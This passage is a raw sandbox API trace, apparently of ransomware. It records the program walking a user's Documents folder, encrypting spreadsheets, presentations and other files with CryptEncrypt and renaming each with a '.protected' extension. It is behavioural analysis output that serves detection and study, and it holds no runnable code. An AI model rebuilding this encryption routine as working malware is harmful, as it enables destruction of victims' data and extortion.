hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.326] CloseHandle (hObject=0xb4) returned 1 [0091.326] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx.protected") returned 70 [0091.326] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8eyvjmegj8d.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8eyvjmegj8d.xlsx.protected")) returned 1 [0091.326] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.327] lstrcmpiW (lpString1="9Fwpsj.ods", lpString2="Windows") returned -1 [0091.327] lstrcmpiW (lpString1="9Fwpsj.ods", lpString2="Program Files") returned -1 [0091.327] lstrcmpiW (lpString1="9Fwpsj.ods", lpString2="Program Files (x86)") returned -1 [0091.327] lstrcmpiW (lpString1="9Fwpsj.ods", lpString2="$Recycle.bin") returned 1 [0091.327] lstrcmpiW (lpString1="9Fwpsj.ods", lpString2="System Volume Information") returned -1 [0091.327] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods") returned 54 [0091.327] StrStrIW (lpFirst="9Fwpsj.ods", lpSrch=".protected") returned 0x0 [0091.327] lstrcmpW (lpString1="9Fwpsj.ods", lpString2="RESTORE_FILES.txt") returned -1 [0091.327] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.327] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9fwpsj.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.327] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods") returned 54 [0091.327] StrStrW (lpFirst="9Fwpsj.ods", lpSrch=".txt") returned 0x0 [0091.327] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods") returned 54 [0091.327] StrStrW (lpFirst="9Fwpsj.ods", lpSrch=".rar") returned 0x0 [0091.327] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods") returned 54 [0091.327] StrStrW (lpFirst="9Fwpsj.ods", lpSrch=".zip") returned 0x0 [0091.327] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.328] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.328] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.328] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.328] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.328] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.328] CloseHandle (hObject=0xb4) returned 1 [0091.328] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods.protected") returned 64 [0091.328] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9fwpsj.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Fwpsj.ods.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9fwpsj.ods.protected")) returned 1 [0091.336] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.336] lstrcmpiW (lpString1="CZj6.csv", lpString2="Windows") returned -1 [0091.336] lstrcmpiW (lpString1="CZj6.csv", lpString2="Program Files") returned -1 [0091.336] lstrcmpiW (lpString1="CZj6.csv", lpString2="Program Files (x86)") returned -1 [0091.336] lstrcmpiW (lpString1="CZj6.csv", lpString2="$Recycle.bin") returned 1 [0091.336] lstrcmpiW (lpString1="CZj6.csv", lpString2="System Volume Information") returned -1 [0091.336] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv") returned 52 [0091.336] StrStrIW (lpFirst="CZj6.csv", lpSrch=".protected") returned 0x0 [0091.336] lstrcmpW (lpString1="CZj6.csv", lpString2="RESTORE_FILES.txt") returned -1 [0091.336] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.336] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\czj6.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.337] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv") returned 52 [0091.337] StrStrW (lpFirst="CZj6.csv", lpSrch=".txt") returned 0x0 [0091.337] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv") returned 52 [0091.337] StrStrW (lpFirst="CZj6.csv", lpSrch=".rar") returned 0x0 [0091.337] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv") returned 52 [0091.337] StrStrW (lpFirst="CZj6.csv", lpSrch=".zip") returned 0x0 [0091.337] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.337] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.337] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.338] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.338] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.338] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.338] CloseHandle (hObject=0xb4) returned 1 [0091.338] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv.protected") returned 62 [0091.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\czj6.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CZj6.csv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\czj6.csv.protected")) returned 1 [0091.339] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.339] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.339] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.339] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.339] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.339] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.339] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 55 [0091.339] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.339] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.339] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.339] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.339] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 55 [0091.339] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0091.339] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 55 [0091.339] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.339] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 55 [0091.339] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.339] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0091.340] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.340] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0091.340] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.340] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.340] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.340] CloseHandle (hObject=0xb4) returned 1 [0091.340] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.protected") returned 65 [0091.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini.protected")) returned 1 [0091.341] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.341] lstrcmpiW (lpString1="dJ XneLh8Fg_.pptx", lpString2="Windows") returned -1 [0091.341] lstrcmpiW (lpString1="dJ XneLh8Fg_.pptx", lpString2="Program Files") returned -1 [0091.341] lstrcmpiW (lpString1="dJ XneLh8Fg_.pptx", lpString2="Program Files (x86)") returned -1 [0091.341] lstrcmpiW (lpString1="dJ XneLh8Fg_.pptx", lpString2="$Recycle.bin") returned 1 [0091.341] lstrcmpiW (lpString1="dJ XneLh8Fg_.pptx", lpString2="System Volume Information") returned -1 [0091.341] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx") returned 61 [0091.341] StrStrIW (lpFirst="dJ XneLh8Fg_.pptx", lpSrch=".protected") returned 0x0 [0091.341] lstrcmpW (lpString1="dJ XneLh8Fg_.pptx", lpString2="RESTORE_FILES.txt") returned -1 [0091.341] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.341] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dj xnelh8fg_.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx") returned 61 [0091.342] StrStrW (lpFirst="dJ XneLh8Fg_.pptx", lpSrch=".txt") returned 0x0 [0091.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx") returned 61 [0091.342] StrStrW (lpFirst="dJ XneLh8Fg_.pptx", lpSrch=".rar") returned 0x0 [0091.342] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx") returned 61 [0091.342] StrStrW (lpFirst="dJ XneLh8Fg_.pptx", lpSrch=".zip") returned 0x0 [0091.342] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.343] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.343] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.343] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.343] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.343] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.343] CloseHandle (hObject=0xb4) returned 1 [0091.343] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx.protected") returned 71 [0091.343] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dj xnelh8fg_.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dJ XneLh8Fg_.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dj xnelh8fg_.pptx.protected")) returned 1 [0091.344] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.344] lstrcmpiW (lpString1="Eze0cP.docx", lpString2="Windows") returned -1 [0091.344] lstrcmpiW (lpString1="Eze0cP.docx", lpString2="Program Files") returned -1 [0091.344] lstrcmpiW (lpString1="Eze0cP.docx", lpString2="Program Files (x86)") returned -1 [0091.344] lstrcmpiW (lpString1="Eze0cP.docx", lpString2="$Recycle.bin") returned 1 [0091.344] lstrcmpiW (lpString1="Eze0cP.docx", lpString2="System Volume Information") returned -1 [0091.344] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Eze0cP.docx") returned 55 [0091.344] StrStrIW (lpFirst="Eze0cP.docx", lpSrch=".protected") returned 0x0 [0091.344] lstrcmpW (lpString1="Eze0cP.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.344] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.344] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Eze0cP.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eze0cp.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Eze0cP.docx") returned 55 [0091.344] StrStrW (lpFirst="Eze0cP.docx", lpSrch=".txt") returned 0x0 [0091.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Eze0cP.docx") returned 55 [0091.344] StrStrW (lpFirst="Eze0cP.docx", lpSrch=".rar") returned 0x0 [0091.344] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Eze0cP.docx") returned 55 [0091.344] StrStrW (lpFirst="Eze0cP.docx", lpSrch=".zip") returned 0x0 [0091.344] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.345] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.345] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.345] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.345] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.345] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.345] CloseHandle (hObject=0xb4) returned 1 [0091.345] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Eze0cP.docx.protected") returned 65 [0091.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Eze0cP.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eze0cp.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Eze0cP.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eze0cp.docx.protected")) returned 1 [0091.346] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.346] lstrcmpiW (lpString1="fNOz68wIWXN.xlsx", lpString2="Windows") returned -1 [0091.346] lstrcmpiW (lpString1="fNOz68wIWXN.xlsx", lpString2="Program Files") returned -1 [0091.346] lstrcmpiW (lpString1="fNOz68wIWXN.xlsx", lpString2="Program Files (x86)") returned -1 [0091.346] lstrcmpiW (lpString1="fNOz68wIWXN.xlsx", lpString2="$Recycle.bin") returned 1 [0091.346] lstrcmpiW (lpString1="fNOz68wIWXN.xlsx", lpString2="System Volume Information") returned -1 [0091.346] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fNOz68wIWXN.xlsx") returned 60 [0091.346] StrStrIW (lpFirst="fNOz68wIWXN.xlsx", lpSrch=".protected") returned 0x0 [0091.346] lstrcmpW (lpString1="fNOz68wIWXN.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.346] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.346] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fNOz68wIWXN.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fnoz68wiwxn.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fNOz68wIWXN.xlsx") returned 60 [0091.347] StrStrW (lpFirst="fNOz68wIWXN.xlsx", lpSrch=".txt") returned 0x0 [0091.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fNOz68wIWXN.xlsx") returned 60 [0091.347] StrStrW (lpFirst="fNOz68wIWXN.xlsx", lpSrch=".rar") returned 0x0 [0091.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fNOz68wIWXN.xlsx") returned 60 [0091.347] StrStrW (lpFirst="fNOz68wIWXN.xlsx", lpSrch=".zip") returned 0x0 [0091.347] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.347] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.347] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.347] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.348] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.348] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.348] CloseHandle (hObject=0xb4) returned 1 [0091.348] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fNOz68wIWXN.xlsx.protected") returned 70 